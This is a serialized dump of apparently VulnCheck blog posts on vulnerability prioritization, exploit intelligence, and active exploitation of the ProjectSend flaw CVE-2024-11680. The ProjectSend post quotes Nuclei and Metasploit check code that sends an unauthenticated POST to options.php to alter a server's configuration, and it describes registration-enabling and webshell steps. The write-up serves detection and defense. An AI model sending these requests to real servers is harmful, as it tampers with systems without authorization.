should account for the value and criticality of the assets affected by a vulnerability. For example, a vulnerability in a public-facing, mission-critical server warrants more immediate attention than one in a low-risk environment. Vulnerabilities on assets accessed by a large number of users, especially those with elevated privileges, can be higher risk. User roles and access privileges are also taken into account when vulnerabilities impact assets managed by privileged users or critical infrastructure administrators. Asset-based prioritization ensures the organization’s most valuable resources are protected.",[25,60606,60607,60610,60611],{},[295,60608,60609],{},"Environmental factors."," Finally, a wide variety of factors related to the local environment can have a significant impact on the risk of a damaging exploit impacting an organization:",[22,60612,60613,60619,60625],{},[25,60614,60615,60618],{},[295,60616,60617],{},"Exposure",". Vulnerabilities on systems exposed to the internet or public networks are often prioritized over those on internal-only assets, as they are more exposed to attack by external threat actors, and could more easily become a vector for initial access.",[25,60620,60621,60624],{},[295,60622,60623],{},"Network segmentation."," Vulnerabilities in isolated segments of the network may be deprioritized if there are additional security layers or isolation.",[25,60626,60627,60630],{},[295,60628,60629],{},"Mitigating controls",". Layered security controls, such as restrictive firewall rules or application allow listing, can limit exposure, meaning that vulnerabilities on protected systems may be ranked lower risk.",[18,60632,60633,60636,60638],{},[295,60634,60635],{},"Challenges in Vulnerability Prioritization",[1823,60637],{},"\nEven in a perfect world, the wide variety of variables make Vulnerability Prioritization a daunting task. Unfortunately, the world is far from perfect. A number challenges make it difficult to put theory into real-world practice:",[22,60640,60641,60647,60653,60659],{},[25,60642,60643,60646],{},[295,60644,60645],{},"Publishing delays."," Public sources of vulnerability data such as the National Vulnerability Database (NVD) and CISA’s Known Exploited Vulnerabilities (KEV) catalog are essential resources, yet they frequently face delays in publishing information. This lag can leave organizations unaware of newly discovered vulnerabilities or exploits, potentially leaving them exposed for days or longer.",[25,60648,60649,60652],{},[295,60650,60651],{},"Data gaps",": Public resources often lack key pieces of data on vulnerabilities. Some vulnerabilities have incomplete descriptions, miss important links to external resources, have outdated severity metrics, or do not include up-to-date exploit information, which complicates prioritization efforts.",[25,60654,60655,60658],{},[295,60656,60657],{},"Escalating and evolving threats",": Threat actors continually adapt their tactics, leveraging new vulnerabilities as soon as they’re weaponized. This constantly changing landscape means that a vulnerability’s risk level can increase unexpectedly, particularly when an exploit becomes widely available.",[25,60660,60661,60664],{},[295,60662,60663],{},"Poor usability",": Many sources of vulnerability intelligence are highly technical and complex, requiring expert interpretation. Furthermore, siloed or difficult-to-integrate data makes it tricky to apply this intelligence in real-time, leaving organizations reliant on manual analysis or outdated threat data.",[18,60666,60667,60670,60672],{},[295,60668,60669],{},"The Importance of Exploit Intelligence in Vulnerability Prioritization",[1823,60671],{},"\nGiven these challenges, high-quality exploit intelligence is invaluable in effective vulnerability prioritization. Exploit intelligence provides critical insights that help organizations assess the likelihood of exploitation, anticipate attack trends, and respond proactively to threats.",[18,60674,60675],{},"Effective exploit intelligence provides defenders with::",[22,60677,60678,60684,60690],{},[25,60679,60680,60683],{},[295,60681,60682],{},"Up-to-date information",": For effective prioritization, security teams require real-time, accurate data on exploit activity, including proof-of-concepts, in-the-wild usage, and tools leveraging specific vulnerabilities. Up-to-date exploit intelligence allows teams to respond before a vulnerability becomes widely exploited, keeping them a step ahead of attackers.",[25,60685,60686,60689],{},[295,60687,60688],{},"Complete data sets",": Comprehensive intelligence goes beyond merely identifying vulnerabilities. It includes critical context on how vulnerabilities can be exploited, attacker motivations, and even the geographical or industry targets of specific campaigns. This depth enables security teams to prioritize based on the actual risks rather than theoretical threats.",[25,60691,60692,60695],{},[295,60693,60694],{},"Seamless integration with vulnerability management workflows",": Exploit intelligence must integrate smoothly into existing workflows to be effective. Security teams benefit from open APIs and standardized data formats that can be integrated directly in their vulnerability management tools, allowing for automated alerting, reporting, and prioritization within their environment. Easy integration reduces the risk of oversight and improves operational efficiency.",[18,60697,60698],{},"With high volumes of complex vulnerabilities, exploit intelligence is key to effective vulnerability management. Security teams armed with up-to-date, tightly integrated, and comprehensive data can make faster, better-informed decisions, protect their high-value assets, and ultimately stay one step ahead of emerging threats.",[44317,60700],{"to":13111},{"title":219,"searchDepth":220,"depth":220,"links":60702},[],"Exploit Intel 101 - Vulnerability Prioritization",{"slug":60705},"vulnerability-prioritization-101","\u002Fblog\u002Fvulnerability-prioritization-101",{"title":60514,"description":60703},{"title":41489,"color":41490,"icon":41491},"blog\u002Fvulnerability-prioritization-101",[41494],"0LGZfGc-lU6DLBvcXvGRX67Qy1FJrel7MSjogst63TA",{"id":60713,"title":42306,"articles":7,"authors":60714,"body":60716,"date":60910,"description":60911,"extension":234,"image":7,"link":7,"meta":60912,"navigation":237,"path":60914,"seo":60915,"series":60916,"stem":60917,"subtype":7,"tags":60918,"__hash__":60919},"blog\u002Fblog\u002Fexploit-intelligence.md",[60715],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":60717,"toc":60903},[60718,60721,60724,60738,60741,60747,60750,60755,60758,60761,60764,60781,60784,60790,60793,60825,60831,60834,60865,60871,60874,60894,60898,60901],[18,60719,60720],{},"In order to stay ahead of today’s emerging threats, it’s critical that defenders have a clear picture of the vulnerabilities present in their environment, and work diligently to close these gaps before an adversary can take advantage of the exposure.",[18,60722,60723],{},"While it sounds simple, the scale of the problem makes it a monumental challenge for most organizations - because fundamentally exploitation happens faster than remediation:",[22,60725,60726,60732],{},[25,60727,60728,60731],{},[295,60729,60730],{},"The number of known vulnerabilities is increasing rapidly",". MITRE’s CVE program has more than 250K vulnerabilities, and is on pace to add more than 25K every year.",[25,60733,60734,60737],{},[295,60735,60736],{},"The time to weaponize a vulnerability is shrinking just as fast."," Today, attackers weaponize vulnerabilities in 8 days or less. Five years ago, it took 1 year on average.",[18,60739,60740],{},"In this environment security teams need to go beyond simple vulnerability management in order to stay ahead of attackers. Exploit Intelligence provides the critical insights that security teams need in order to prioritize and act before a damaging breach.",[993,60742,60744],{"id":60743},"what-is-exploit-intelligence",[295,60745,60746],{},"What is Exploit Intelligence?",[18,60748,60749],{},"Fortunately, the news is not all bad for defenders. While the number of vulnerabilities is high, the number that are actually exploited in the wild is quite low. In practice, while security teams may face tens of thousands of known vulnerabilities, only 2-3% of disclosed vulnerabilities are exploited or likely to be exploited. If we can correctly identify that 2%, the effort needed to remediate is slashed dramatically, and the balance swings back in the defender’s favor.",[18,60751,60752],{},[295,60753,60754],{},"Exploit Intelligence offers actionable insights into which vulnerabilities are being actively exploited, or are likely to be soon, and how organizations can prioritize their defenses accordingly.",[18,60756,60757],{},"Unlike traditional vulnerability management, which focuses on cataloging software flaws, Exploit Intelligence helps narrow the scope to those vulnerabilities that pose the most immediate and active threat to your environment.",[18,60759,60760],{},"This intelligence is gathered from multiple sources, such as threat actor behavior, exploit kits, public as well as underground forums, and real-world attacks, giving security teams the necessary context to understand which vulnerabilities are being used as attack vectors at any given moment. With Exploit Intelligence, organizations can move beyond just knowing which software is flawed and take steps to prioritize remediation based on real-world exploitation activity.",[18,60762,60763],{},"Exploit Intelligence helps technical buyers answer key questions such as:",[22,60765,60766,60771,60776],{},[25,60767,60768],{},[295,60769,60770],{},"Which vulnerabilities are being actively exploited by attackers?",[25,60772,60773],{},[295,60774,60775],{},"Which vulnerabilities are likely to be exploited in the near future?",[25,60777,60778],{},[295,60779,60780],{},"Which patches should be prioritized to mitigate the greatest risk?",[18,60782,60783],{},"Exploit Intelligence provides critical decision-making support, enabling organizations to focus their resources where they matter most.",[993,60785,60787],{"id":60786},"how-does-exploit-intelligence-work-with-vulnerability-intelligence",[295,60788,60789],{},"How Does Exploit Intelligence Work With Vulnerability Intelligence?",[18,60791,60792],{},"Vulnerability Intelligence provides raw information about weaknesses in software or hardware systems, but it doesn’t provide sufficient information to allow security teams to understand the potential real-world impact. Exploit Intelligence augments and enriches vulnerability data with key contextual information, such as:",[22,60794,60795,60801,60807,60813,60819],{},[25,60796,60797,60800],{},[295,60798,60799],{},"Exploit Availability"," - A vulnerability with a known exploit available in the wild introduces more risk to an environment than one without any known exploits, and deserves higher prioritization.",[25,60802,60803,60806],{},[295,60804,60805],{},"Exploit Maturity"," - Not all exploits are created equal. There is a big difference between a theoretical proof-of-concept exploit described by a researcher vs. an exploit that has been weaponized in a common malware or exploit framework.",[25,60808,60809,60812],{},[295,60810,60811],{},"Exploit Type"," - Exploits can allow an adversary to achieve a wide range of goals, from gaining initial access to a system remotely, to leaking sensitive information from a target, to causing a crash of a service or application.",[25,60814,60815,60818],{},[295,60816,60817],{},"Exploitation Timelines"," - Understanding the evolution of exploits associated with a vulnerability can help defenders predict how it will impact their systems in the future.",[25,60820,60821,60824],{},[295,60822,60823],{},"Threat intelligence"," - Exploit intelligence links vulnerabilities to known threats, including ransomware families, botnets, and named threat actors, allowing security teams to see the bigger picture and understand how exploits fit into an adversary’s broader goals and tactics.",[993,60826,60828],{"id":60827},"what-are-some-practical-applications-of-exploit-intelligence",[295,60829,60830],{},"What Are Some Practical Applications of Exploit Intelligence?",[18,60832,60833],{},"Exploit Intelligence can be applied across several key areas within an organization's cybersecurity operations. Here are some practical ways in which it improves security outcomes:",[1789,60835,60836,60841,60847,60853,60859],{},[25,60837,60838,60840],{},[295,60839,60514],{},": Generalized vulnerability scores such as CVSS don’t provide enough context to reduce mountains of vulnerabilities into a manageable amount of work. Exploit Intelligence enriches the process with real world insights, ensuring that the most pressing vulnerabilities are addressed first.",[25,60842,60843,60846],{},[295,60844,60845],{},"Early Warning",": Exploit Intelligence can provide security teams with real-time notifications on vulnerabilities in their devices or software being exploited in the wild by threat actors, or new exploit PoCs affecting their devices or supply chain.",[25,60848,60849,60852],{},[295,60850,60851],{},"Threat Hunting",": Armed with knowledge of potential exploits, threat hunters can proactively search for signs of compromise in their environment, identify potential attack vectors, and improve defenses before attacks occur.",[25,60854,60855,60858],{},[295,60856,60857],{},"Patch Management",": Traditional patch management strategies often focus on the base severity of a vulnerability, but this can leave organizations exposed to lower-severity exploits that are actively being used in the wild. By integrating Exploit Intelligence into the patch management process, security teams can better allocate resources and reduce exposure to active threats.",[25,60860,60861,60864],{},[295,60862,60863],{},"Incident Response",": In the event of a security incident, Exploit Intelligence can help responders to quickly develop a more complete picture of the breach. Understanding how the incident began, what threat actors are tied to the relevant TTPs, and what other tactics they are likely to employ helps security teams to respond more quickly and effectively, minimizing the potential for additional damage.",[993,60866,60868],{"id":60867},"features-of-a-strong-exploit-intelligence-solution",[295,60869,60870],{},"Features of a Strong Exploit Intelligence Solution",[18,60872,60873],{},"For organizations evaluating Exploit Intelligence solutions, it's important to understand what makes a platform effective. Here are some key features to look for:",[22,60875,60876,60882,60888],{},[25,60877,60878,60881],{},[295,60879,60880],{},"Breadth of Data Sources",": A strong Exploit Intelligence platform should pull data from a wide range of sources, including threat actor activity, exploit kits, dark web forums, and real-time attack data in order to provide the most comprehensive intelligence possible..",[25,60883,60884,60887],{},[295,60885,60886],{},"Timeliness",": It can take days or even weeks for basic vulnerability data to be updated on well-known public feeds such as NIST NVD and CISA KEV. Real-time data is critical in Exploit Intelligence. The ability to detect and report on exploits as they emerge gives security teams the edge they need to stay ahead of accelerating attacks.",[25,60889,60890,60893],{},[295,60891,60892],{},"Integration with Existing Security Tools",": By itself, Exploit Intelligence is just data; it’s only useful when it’s helping to enrich and accelerate workflows in the SOC. Exploit Intelligence should seamlessly integrate with other security tools, such as vulnerability management systems, SIEMs, and SOC platforms. This enables security teams to correlate exploit data with existing alerts and data, making the intelligence actionable.",[993,60895,60896],{"id":1902},[295,60897,1903],{},[18,60899,60900],{},"Exploit Intelligence is a critical tool for organizations who need to prioritize their defenses against real-world threats. By focusing on vulnerabilities that are actively being exploited, organizations can make informed decisions about where to focus their efforts, optimize their remediation efforts, and quickly improve their security posture.",[44317,60902],{"to":13111},{"title":219,"searchDepth":220,"depth":220,"links":60904},[60905,60906,60907,60908,60909],{"id":60743,"depth":1266,"text":60746},{"id":60786,"depth":1266,"text":60789},{"id":60827,"depth":1266,"text":60830},{"id":60867,"depth":1266,"text":60870},{"id":1902,"depth":1266,"text":1903},"2024-12-02","Exploit Intel 101 - Exploit Intelligence and the Role of Threat Actor Intelligence in Cybersecurity Products",{"slug":60913},"exploit-intelligence","\u002Fblog\u002Fexploit-intelligence",{"title":42306,"description":60911},{"title":41489,"color":41490,"icon":41491},"blog\u002Fexploit-intelligence",[41494],"obO6MrR7drIfevfQfPD9egSWqsxI5XCHUwSRYFagqw4",{"id":60921,"title":36637,"articles":60922,"authors":60968,"body":60970,"date":61400,"description":61401,"extension":234,"image":7,"link":7,"meta":61402,"navigation":237,"path":61404,"seo":61405,"series":7,"stem":61406,"subtype":7,"tags":61407,"__hash__":61408},"blog\u002Fblog\u002Fprojectsend-exploited-itw.md",[60923,60927,60930,60933,60937,60941,60944,60949,60952,60955,60958,60962,60965],{"title":60924,"source":14373,"link":60925,"date":60926},"Hackers exploit ProjectSend flaw to backdoor exposed servers","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fhackers-exploit-projectsend-flaw-to-backdoor-exposed-servers\u002F","2024-11-27",{"title":60928,"source":14386,"link":60929,"date":60926},"Hackers Exploiting ProjectSend Authentication Vulnerability In The Wild","https:\u002F\u002Fcybersecuritynews.com\u002Fprojectsend-authentication-vulnerability\u002F#google_vignette",{"title":60931,"source":3495,"link":60932,"date":60926},"Risky Biz News: Banshee Stealer shuts down after source code leak","https:\u002F\u002Fnews.risky.biz\u002Frisky-biz-news-banshee-stealer-shuts-down-after-source-code-leak\u002F",{"title":60934,"source":60935,"link":60936,"date":60926},"CVE Created for 18 Month-Old Flaw","SC Media UK","https:\u002F\u002Finsight.scmagazineuk.com\u002Fcve-created-for-18-month-old-flaw",{"title":60938,"source":60939,"link":60940,"date":60926},"ProjectSend Vulnerability Exploited in the Wild","Security Week","https:\u002F\u002Fwww.securityweek.com\u002Fprojectsend-vulnerability-exploited-in-the-wild\u002F",{"title":60942,"source":14382,"link":60943,"date":60926},"Critical Flaw in ProjectSend Under Active Exploitation Against Public-Facing Servers","https:\u002F\u002Fthehackernews.com\u002F2024\u002F11\u002Fcritical-flaw-in-projectsend-under.html",{"title":60945,"source":60946,"link":60947,"date":60948},"Jetzt patchen! Attacken auf Filesharingplattform ProjectSend beobachtet","Heise","https:\u002F\u002Fwww.heise.de\u002Fnews\u002FJetzt-patchen-Attacken-auf-Filesharingplattform-ProjectSend-beobachtet-10181736.html","2024-11-28",{"title":60950,"source":57680,"link":60951,"date":60948},"Malicious Actors Exploit ProjectSend Critical Vulnerability","https:\u002F\u002Fwww.infosecurity-magazine.com\u002Fnews\u002Fexploit-projectsend-critical\u002F",{"title":60953,"source":37266,"link":60954,"date":60948},"Researchers sound alarm over hackers exploiting critical ProjectSend vulnerability","https:\u002F\u002Fwww.itpro.com\u002Fsecurity\u002Fcyber-crime\u002Fresearchers-sound-alarm-over-hackers-exploiting-critical-projectsend-vulnerability",{"title":60956,"source":14390,"link":60957,"date":60948},"ProjectSend critical flaw actively exploited in the wild, experts warn","https:\u002F\u002Fsecurityaffairs.com\u002F171494\u002Fhacking\u002Fprojectsend-critical-flaw-actively-exploited.html",{"title":60959,"source":60960,"link":60961,"date":60948},"ProjectSend security flaws hit to access background servers","TechRadar","https:\u002F\u002Fwww.techradar.com\u002Fpro\u002Fsecurity\u002Fprojectsend-security-flaws-hit-to-access-background-servers",{"title":60963,"source":60960,"link":60964,"date":60086},"Zyxel, ProjectSend, CyberPanel vulnerabilities actively exploited, so patch now","https:\u002F\u002Fwww.techradar.com\u002Fpro\u002Fsecurity\u002Fzyxel-projectsend-cyberpanel-vulnerabilities-actively-exploited-so-patch-now",{"title":60966,"source":14382,"link":60967,"date":60086},"CISA Warns of Active Exploitation of Flaws in Zyxel, ProjectSend, and CyberPanel","https:\u002F\u002Fthehackernews.com\u002F2024\u002F12\u002Fcisa-warns-of-active-exploitation-of.html",[60969],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":60971,"toc":61393},[60972,60975,61020,61024,61028,61032,61039,61045,61048,61051,61100,61103,61281,61284,61290,61301,61307,61310,61316,61319,61329,61335,61341,61345,61350,61358,61361,61363,61366,61368,61379,61390],[263,60973],{":list":60974,"ico":266,"title":36637},"[\"Public-facing ProjectSend instances appear to have been exploited by attackers.\",\"99% of ProjectSend instances remain vulnerable and have not upgraded to the patched version released in August.\",\"Public exploits have pre-dated CVE assignment by months, including Nuclei templates and a weaponized Metasploit module.\"]",[18,60976,60977,60982,60983,60987,60988,60992,60993,60997,60998,1246,61003,61008,61009,61013,61014,61019],{},[47,60978,60981],{"href":60979,"rel":60980},"https:\u002F\u002Fwww.projectsend.org\u002F",[51],"ProjectSend"," is an open-source file-sharing web application. The project is moderately popular, with almost 1,500 ",[47,60984,2485],{"href":60985,"rel":60986},"https:\u002F\u002Fgithub.com\u002Fprojectsend\u002Fprojectsend",[51]," stars and more than 4,000 instances indexed by ",[47,60989,55030],{"href":60990,"rel":60991},"https:\u002F\u002Fsearch.censys.io\u002Fsearch?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=INCLUDE&q=same_service%28services.http.response.html_title%3A%22Log+In+%26raquo%3B+%22+and+services.banner%3A%22Set-Cookie%3A+PHPSESSID%22+and+services.http.response.body%3A%22ckeditor.js%22+and+services.http.response.body%3A%22jquery-migrate.min.js%22%29",[51],". Although the CVE for this vulnerability was only published today (November 26), the ",[47,60994,33285],{"href":60995,"rel":60996},"https:\u002F\u002Fgithub.com\u002Fprojectsend\u002Fprojectsend\u002Fcommit\u002F193367d937b1a59ed5b68dd4e60bd53317473744",[51]," has been publicly available for over a year (May 16, 2023). Since the patch release, multiple exploits have been published by ",[47,60999,61002],{"href":61000,"rel":61001},"https:\u002F\u002Fwww.synacktiv.com\u002Fsites\u002Fdefault\u002Ffiles\u002F2024-07\u002Fsynacktiv-projectsend-multiple-vulnerabilities.pdf",[51],"Synactiv",[47,61004,61007],{"href":61005,"rel":61006},"https:\u002F\u002Fgithub.com\u002Fprojectdiscovery\u002Fnuclei-templates\u002Fblob\u002Fmain\u002Fhttp\u002Fvulnerabilities\u002Fprojectsend-auth-bypass.yaml",[51],"Project Discovery"," (Nuclei), and ",[47,61010,33465],{"href":61011,"rel":61012},"https:\u002F\u002Fgithub.com\u002Frapid7\u002Fmetasploit-framework\u002Fblob\u002Fmaster\u002Fmodules\u002Fexploits\u002Flinux\u002Fhttp\u002Fprojectsend_unauth_rce.rb",[51]," (Metasploit). The lack of a CVE is an oversight that stands out, particularly given Rapid7’s status as a ",[47,61015,61018],{"href":61016,"rel":61017},"https:\u002F\u002Fwww.cve.org\u002FPartnerInformation\u002FListofPartners",[51],"CNA"," (CVE Numbering Authority) with Researcher and Open Source scope.",[61,61021,61023],{"id":61022},"vulnerability-timeline","Vulnerability Timeline",[61025,61026],"time-line",{":entries":61027},"[{\"date\":\"January 19, 2023\",\"markdown\":\"Synactiv discloses to ProjectSend\"},{\"date\":\"May 16, 2023\",\"markdown\":\"ProjectSend patches the vulnerability\"},{\"date\":\"July 19, 2024\",\"markdown\":\"Synactiv releases an advisory\"},{\"date\":\"August 3, 2024\",\"markdown\":\"ProjectSend releases the official patch in r1720\"},{\"date\":\"August 30, 2024\",\"markdown\":\"A Metasploit pull request is opened\"},{\"date\":\"September 3, 2024\",\"markdown\":\"A Nuclei pull request is opened\"},{\"date\":\"November 25, 2024\",\"markdown\":\"VulnCheck assigns CVE-2024-11680\"}]",[61,61029,61031],{"id":61030},"exploited-in-the-wild","Exploited in the Wild",[18,61033,61034,61035,4606],{},"VulnCheck noticed that public-facing ProjectSend servers had started to change their landing page titles to long, random-ish strings. Some of the “random” names have larger groupings, for ",[47,61036,27177],{"href":61037,"rel":61038},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=title%3A%22Log+in+%26raquo%3B+2nVsqpahM2JlULBOKl4HZg2JMXb%22",[51],[18,61040,61041],{},[68,61042],{":width":10862,"alt":61043,"src":61044},"Victims on Shodan","\u002Fblog\u002Fprojectsend-exploited-itw\u002Fshodan-victims.png",[18,61046,61047],{},"These long and random-ish names are in line with how both Nuclei and Metasploit implement their vulnerability testing logic. Both exploit tools modify the victim’s configuration file to alter the sitename (and therefore HTTP title) with a random value.",[18,61049,61050],{},"Nuclei exploit check:",[1354,61052,61056],{"className":61053,"code":61054,"language":61055,"meta":219,"style":219},"language-yaml shiki shiki-themes material-theme-lighter github-light github-dark monokai","- raw:\n - |\n POST \u002Foptions.php HTTP\u002F1.1\n Host: {{Hostname}}\n Content-Type: application\u002Fx-www-form-urlencoded\n\n csrf_token={{csrf}}§ion=general&this_install_title={{string}}\n","yaml",[886,61057,61058,61068,61076,61081,61086,61091,61095],{"__ignoreMap":219},[1373,61059,61060,61063,61066],{"class":1375,"line":1376},[1373,61061,61062],{"class":1383},"-",[1373,61064,61065],{"class":6300}," raw",[1373,61067,11747],{"class":1383},[1373,61069,61070,61073],{"class":1375,"line":220},[1373,61071,61072],{"class":1383}," -",[1373,61074,61075],{"class":4636}," |\n",[1373,61077,61078],{"class":1375,"line":1266},[1373,61079,61080],{"class":1391}," POST \u002Foptions.php HTTP\u002F1.1\n",[1373,61082,61083],{"class":1375,"line":1852},[1373,61084,61085],{"class":1391}," Host: {{Hostname}}\n",[1373,61087,61088],{"class":1375,"line":4692},[1373,61089,61090],{"class":1391}," Content-Type: application\u002Fx-www-form-urlencoded\n",[1373,61092,61093],{"class":1375,"line":4724},[1373,61094,6520],{"emptyLinePlaceholder":237},[1373,61096,61097],{"class":1375,"line":4756},[1373,61098,61099],{"class":1391}," csrf_token={{csrf}}§ion=general&this_install_title={{string}}\n",[18,61101,61102],{},"Metasploit exploit check:",[1354,61104,61108],{"className":61105,"code":61106,"language":61107,"meta":219,"style":219},"language-ruby shiki shiki-themes material-theme-lighter github-light github-dark monokai","# Test if the instance is vulnerable by trying to change its title\nparams = {\n 'csrf_token' => csrf_token,\n 'section' => 'general',\n 'this_install_title' => random_new_title\n}\nres = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], 'options.php'),\n 'keep_cookie' => true,\n 'vars_post' => params\n})\n","ruby",[886,61109,61110,61115,61124,61141,61161,61175,61179,61191,61209,61248,61263,61277],{"__ignoreMap":219},[1373,61111,61112],{"class":1375,"line":1376},[1373,61113,61114],{"class":4630},"# Test if the instance is vulnerable by trying to change its title\n",[1373,61116,61117,61120,61122],{"class":1375,"line":220},[1373,61118,7627],{"class":61119},"s94S9",[1373,61121,8575],{"class":1397},[1373,61123,4765],{"class":1383},[1373,61125,61126,61129,61132,61134,61136,61139],{"class":1375,"line":1266},[1373,61127,61128],{"class":1387}," '",[1373,61130,61131],{"class":1391},"csrf_token",[1373,61133,1388],{"class":1387},[1373,61135,4986],{"class":1383},[1373,61137,61138],{"class":4640}," csrf_token",[1373,61140,9062],{"class":1383},[1373,61142,61143,61145,61148,61150,61152,61154,61157,61159],{"class":1375,"line":1852},[1373,61144,61128],{"class":1387},[1373,61146,61147],{"class":1391},"section",[1373,61149,1388],{"class":1387},[1373,61151,4986],{"class":1383},[1373,61153,4713],{"class":1387},[1373,61155,61156],{"class":1391},"general",[1373,61158,1388],{"class":1387},[1373,61160,9062],{"class":1383},[1373,61162,61163,61165,61168,61170,61172],{"class":1375,"line":4692},[1373,61164,61128],{"class":1387},[1373,61166,61167],{"class":1391},"this_install_title",[1373,61169,1388],{"class":1387},[1373,61171,4986],{"class":1383},[1373,61173,61174],{"class":4640}," random_new_title\n",[1373,61176,61177],{"class":1375,"line":4724},[1373,61178,1855],{"class":1383},[1373,61180,61181,61183,61185,61188],{"class":1375,"line":4756},[1373,61182,47190],{"class":61119},[1373,61184,8575],{"class":1397},[1373,61186,61187],{"class":7297}," send_request_cgi",[1373,61189,61190],{"class":1383},"({\n",[1373,61192,61193,61195,61197,61199,61201,61203,61205,61207],{"class":1375,"line":4768},[1373,61194,61128],{"class":1387},[1373,61196,49218],{"class":1391},[1373,61198,1388],{"class":1387},[1373,61200,4986],{"class":1383},[1373,61202,4713],{"class":1387},[1373,61204,6946],{"class":1391},[1373,61206,1388],{"class":1387},[1373,61208,9062],{"class":1383},[1373,61210,61211,61213,61216,61218,61220,61223,61225,61228,61230,61232,61235,61237,61239,61241,61244,61246],{"class":1375,"line":4792},[1373,61212,61128],{"class":1387},[1373,61214,61215],{"class":1391},"uri",[1373,61217,1388],{"class":1387},[1373,61219,4986],{"class":1383},[1373,61221,61222],{"class":7297}," normalize_uri",[1373,61224,1384],{"class":1383},[1373,61226,61227],{"class":4640},"datastore",[1373,61229,7035],{"class":1383},[1373,61231,1388],{"class":1387},[1373,61233,61234],{"class":1391},"TARGETURI",[1373,61236,1388],{"class":1387},[1373,61238,27625],{"class":1383},[1373,61240,4713],{"class":1387},[1373,61242,61243],{"class":1391},"options.php",[1373,61245,1388],{"class":1387},[1373,61247,17933],{"class":1383},[1373,61249,61250,61252,61255,61257,61259,61261],{"class":1375,"line":4798},[1373,61251,61128],{"class":1387},[1373,61253,61254],{"class":1391},"keep_cookie",[1373,61256,1388],{"class":1387},[1373,61258,4986],{"class":1383},[1373,61260,14986],{"class":14985},[1373,61262,9062],{"class":1383},[1373,61264,61265,61267,61270,61272,61274],{"class":1375,"line":4806},[1373,61266,61128],{"class":1387},[1373,61268,61269],{"class":1391},"vars_post",[1373,61271,1388],{"class":1387},[1373,61273,4986],{"class":1383},[1373,61275,61276],{"class":4640}," params\n",[1373,61278,61279],{"class":1375,"line":4817},[1373,61280,9809],{"class":1383},[18,61282,61283],{},"This is a very heavy-handed “test” (although in Metasploit’s defense, they at least try to restore the original value) and not something any “researcher” should actually be doing. Especially considering the application's publication date is embedded right in the landing page (e.g. you can determine if a vulnerable version is being used without exploiting the target). Regardless, these random titles started to appear in September, just as the Metasploit and Nuclei exploits were made public.",[18,61285,61286],{},[68,61287],{":width":10862,"alt":61288,"src":61289},"Victims over time","\u002Fblog\u002Fprojectsend-exploited-itw\u002Fshodan-graph.png",[18,61291,61292,61293,61295,61296,61300],{},"While the endpoint might be fairly generic (",[886,61294,61243],{},"), our friend over at ",[47,61297,11029],{"href":61298,"rel":61299},"https:\u002F\u002Fviz.greynoise.io\u002Fquery\u002Fraw_data.web.paths:%22%2Foptions.php%22",[51]," also appear to index more than one hundred IP addresses hitting that URI.",[18,61302,61303],{},[68,61304],{":width":10862,"alt":61305,"src":61306},"Potential attackers on GreyNoise","\u002Fblog\u002Fprojectsend-exploited-itw\u002Fgreynoise-options.png",[18,61308,61309],{},"What’s more concerning is that attackers don’t appear to stop at “testing.” One of the next steps in exploitation involves enabling user registration (a non-default setting) to gain post-authentication privileges. When this setting is activated, the text on the landing page changes to prompt users to register an account. An example from a victim site follows (the URL and branding of been blocked out):",[18,61311,61312],{},[68,61313],{":width":10862,"alt":61314,"src":61315},"Victim with registration enabled","\u002Fblog\u002Fprojectsend-exploited-itw\u002Fregistration-enabled.png",[18,61317,61318],{},"Given how widespread we are seeing this setting enabled, we think this is likely a bigger problem than “researchers intrusively checking for vulnerable versions.” We are likely in the “attackers installing webshells” territory (technically, the vulnerability also allows the attacker to embed malicious JavaScript, too, which could be an interesting and different attack scenario).",[18,61320,61321,61322,61325,61326,59],{},"If an attacker has uploaded a webshell, it can be found in a predictable location in ",[886,61323,61324],{},"upload\u002Ffiles\u002F"," off of the webroot. The files are assigned a predictable name that might help identify exploit timelines as well: ",[886,61327,61328],{},"{posix timestamp of upload}-{sha1 username}-{original file name}.{original extension}",[18,61330,61331],{},[68,61332],{":width":10862,"alt":61333,"src":61334},"Webshell on disk","\u002Fblog\u002Fprojectsend-exploited-itw\u002Fwebshell.png",[18,61336,61337,61338,61340],{},"Additionally, these files are not meant to be directly accessed - downloads are intended to go through an entirely different endpoint. Reviewing the server access logs for direct access to ",[886,61339,61324],{}," will likely be useful in determining exploitation.",[61,61342,61344],{"id":61343},"patch-adoption","Patch Adoption",[18,61346,61347],{},[68,61348],{":width":10862,"alt":61333,"src":61349},"\u002Fblog\u002Fprojectsend-exploited-itw\u002Fvulnerable-piechart.png",[18,61351,61352,61353,61357],{},"The VulnCheck Initial Access team developed a scanner to fingerprint the versions of internet-facing systems. Using the ",[47,61354,41731],{"href":61355,"rel":61356},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=title%3A%22%26raquo%3B%22+%2B%22Set-Cookie%3A+PHPSESSID%22+html%3A%22ckeditor.js%22",[51]," data, we found approximately 1% were using the patched version (r1750). 55% are using r1605 (released October 2022), 44% are using an unnamed release (released April 2023), and the remaining 1% are using the patched r1750.",[18,61359,61360],{},"Given the timeline, evidence of exploitation, and lack of patch adoption, we assume that exploitation is likely widespread. And if not now, then in the near future considering the abysmal patching rates.",[61,61362,1903],{"id":1902},[18,61364,61365],{},"The ProjectSend vulnerability, now identified as CVE-2024-11680, has been publicly known for some time. A patch was released on May 16, 2023, and various exploits have been available for months. However, due to the absence of a CVE assignment, centralized documentation was lacking. With the CVE now assigned and evidence of ongoing exploitation, it is crucial for security companies to assess their customers' exposure, implement necessary remediations, and conduct incident response activities as needed.",[61,61367,202],{"id":201},[18,61369,53821,61370,1246,61373,1255,61376],{},[47,61371,40447],{"href":53829,"rel":61372},[51],[47,61374,55229],{"href":53837,"rel":61375},[51],[47,61377,22211],{"href":53842,"rel":61378},[51],[18,61380,53846,61381,53850,61384,982,61387,1260],{},[47,61382,1233],{"href":2871,"rel":61383},[51],[47,61385,1245],{"href":45535,"rel":61386},[51],[47,61388,216],{"href":214,"rel":61389},[51],[2901,61391,61392],{},"html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sHsBP, html code.shiki 